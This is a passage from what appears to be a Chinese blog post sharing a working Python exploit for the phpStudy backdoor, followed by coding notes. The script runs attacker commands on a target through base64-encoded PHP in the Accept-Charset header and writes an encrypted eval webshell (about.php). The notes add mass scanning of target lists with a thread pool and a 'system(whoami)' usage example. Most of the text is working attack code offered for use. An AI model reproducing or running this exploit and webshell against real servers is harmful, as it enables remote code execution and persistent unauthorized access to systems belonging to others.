        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = self._command
        try:
            response = requests.get(self._url,headers=headers)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Command Execute Successful.')
                print(response.text)
            else:
                 print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except:
            print('[-] Looks Like Something Wrong.\n')
        
    def upload_shell_2018(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vUEhQVHV0b3JpYWwvV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='

        try:
            response = requests.get(self._url,headers=headers)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0],self._url.split('/')[2]))
            else:
                 print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except:
            print('[-] Looks Like Something Wrong.\n')
    
    def upload_shell_2016(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='
        try:
            response = requests.get(self._url,headers=headers)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0],self._url.split('/')[2]))
            else:
                 print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except:
            print('[-] Looks Like Something Wrong.\n')
    

def main():
    x = phpstudy_backdoor_getshell('','')
    try:
        while True:
            url = input("Target url:\n")
            if ('http://' or 'https://') not in url:
                print('[-] Please input target url with http or https')
            else:
                print('[-] Checking Target...')
                x.url = url
                if x.check_Target():
                    cmd = input("Input Your Command:\n")
                    command = base64.b64encode(cmd.encode('utf-8'))
                    x.command = command
                    x.exploit()
                    print('[-] upload a Behinder webshell')
                    target = input('Please choose the version for phpstudy [2018/2016]\n')
                    if target == '2018':
                        x.upload_shell_2018()
                    elif target == '2016':
                        x.upload_shell_2016()
                else:
                    print('[-] some error!')
    except KeyboardInterrupt:
        sys.exit()

if __name__ == '__main__':
    main()

漏洞复现及php传shell

PHP文件写入

phpstudy后门漏洞复现

代码编写总结

记录一些忘了的点,想到哪说哪

关闭https警告

1
2
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

使用线程池

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def main():
    files = input('please input the files:\n')
    try:
        with open(files,'r') as f:
            lines = f.read().splitlines()  #读取为一个列表
            print(lines)
            task_pool = threadpool.ThreadPool(10)
            requests = threadpool.makeRequests(check,lines)

        for req in requests:
            task_pool.putRequest(req)
            task_pool.wait()
    except KeyboardInterrupt:
        sys.exit()

requests请求后解析时自动判断编码问题

1
2
3
自动判断编码后,使用requests.text有时候会乱码,直接一点,在返回解析时指定编码

result.encoding = 'gbk'

面向对象编程(类)高级用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
为了保证安全性以及代码的健壮性,不直接定义私有变量,而是通过提示私有变量,通过装饰器来实现,并且使用object来继承,方便高级调用

class phpstudy_backdoor_getshell(object):
    def __init__(self,url,command):
        self._url = url
        self._command = command
    
    #访问器 - getter()方法
    @property
    def url(self):
        return self._url
    
    @property
    def command(self):
        return self._command
    
    #修改器 - setter()方法
    @url.setter
    def url(self,url):
        self._url = url
    
    @command.setter
    def command(self,command):
        self._command = command
        
        
初始化的时候带了了参数,所以在实例化的时候要带参数(脑子一抽风),懒得改了,直接在实例化的时候传两个空参数进去,后面再进行自己构造调用


def main():
    x = phpstudy_backdoor_getshell('','')  #空参数
    try:
        while True:
            url = input("Target url:\n")
            if ('http://' or 'https://') not in url:
                print('[-] Please input target url with http or https')
            else:
                print('[-] Checking Target...')
                x.url = url					#具体调用
                if x.check_Target():
                    cmd = input("Input Your Command:\n")
                    command = base64.b64encode(cmd.encode('utf-8'))
                    x.command = command
                    x.exploit()
                    print('[-] upload a Behinder webshell')
                    target = input('Please choose the version for phpstudy [2018/2016]\n')
                    if target == '2018':
                        x.upload_shell_2018()
                    elif target == '2016':
                        x.upload_shell_2016()
                else:
                    print('[-] some error!')
    except KeyboardInterrupt:
        sys.exit()

argparse参数化解析编程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
定义description以及usage,为了防止在调用命令时出现的如反斜杠之类的参数被转义,使用单双引号等避免转义,略显麻烦

parse = argparse.ArgumentParser(description='EXP for phpstudy_backdoor.')
    parse.usage="""phpstudy_backdoor_getshell.py [-h] [-u URL] [-c ...]

       example: python3 phpstudy_backdoor_getshell.py -u http://192.168.1.103/index.php -c 'system(\\"whoami\\");'

       使用反斜杠和单双引号防止转义的问题,并解决argparse下以空格解析参数不能当做一个字符串的问题
    """
    
    
    

在定义参数时,后面可能跟不止一个参数,尤其是执行系统命令,为了方便,不限定后面接的数量(nargs=argparse.REMAINDER);同时使用解析参数的时候将后面跟的参数(以空格分开的)拼接成一个字符串

parse.add_argument('-c','--command', nargs=argparse.REMAINDER,help='Please input the exploit command')

if args.url and args.command:
            commands = '' 
            for cmd in args.command:
                commands += cmd + ' '
            command = base64.b64encode(commands.encode('utf-8'))
            x.url = args.url
            x.command = command
            x.exploit()

主要是一些细节上的点记不清了,特此记录一下

代码地址

github地址

参考

https://yzddmr6.tk/posts/phpstudy-backdoor/

https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp